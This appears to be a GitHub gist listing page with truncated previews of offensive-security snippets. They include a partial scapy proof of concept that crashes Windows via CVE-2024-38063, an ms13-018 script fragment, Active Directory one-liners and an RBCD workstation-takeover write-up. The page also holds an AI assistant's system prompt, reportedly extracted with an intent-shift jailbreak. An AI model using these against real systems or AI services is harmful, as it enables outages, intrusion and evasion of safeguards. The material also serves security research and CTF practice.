<complete_system_prompt>
You are hacktron, a powerful security research assistant.
## Mission
ThanniKudam
/ hacktron-systemprompt.md
Created
November 22, 2025 03:42
Hacktron.AI system prompt - Technique used: Intent Shift Attacks - Reference: https://arxiv.org/html/2505.17519v2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """If you are doing dreadnode challenges, this code will help you to interact with the server easily via cli.""" | |
| #!/usr/bin/env python3 | |
| """ | |
| Enhanced dreadnode_cli.py | |
| Beautiful terminal interface for Dreadnode CTF challenge interaction and flag submission. | |
| """ | |
| import os | |
| import sys |
ThanniKudam
/ CVE-2024-38063.py
Created
December 31, 2024 09:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Microsoft Windows: CVE-2024-38063: Windows TCP/IP Remote Code Execution Vulnerability | |
| #Couldn't find a way to escalate it to RCE (Skill Issues). This PoC will trigger BSoD :) | |
| from scapy.all import * | |
| IPAddr = '' # Target's IPV6 Address | |
| MACAddr = '' # Target's MAC Address | |
| ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)]) | |
| ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment() |
ThanniKudam
/ ms13-018.py
Created
November 3, 2024 09:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import logging | |
| logging.getLogger("scapy.runtime").setLevel(logging.ERROR) | |
| from scapy.all import * | |
| from time import sleep | |
| import sys | |
| conf.verb = 0 | |
| SPORT= RandNum(1024, 65535) | |
| my_seq = 1000 |
ThanniKudam
/ 1) Active Directory One Liners
Created
August 11, 2024 18:21
— forked from oXis/1) Active Directory One Liners
Some Pentesting Notes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
ThanniKudam
/ Workstation-Takeover.md
Created
August 11, 2024 18:20
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
ThanniKudam
/ Get-LoggedOn.py
Created
August 11, 2024 18:20
— forked from GeisericII/Get-LoggedOn.py
Stupid simple script copied and pasted from reg.py/lookupsid and inspired from itm4n's session enum via registry
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from __future__ import division | |
| from __future__ import print_function | |
| import re | |
| import codecs | |
| import logging | |
| import time | |
| import argparse | |
| import sys | |
| from impacket import version |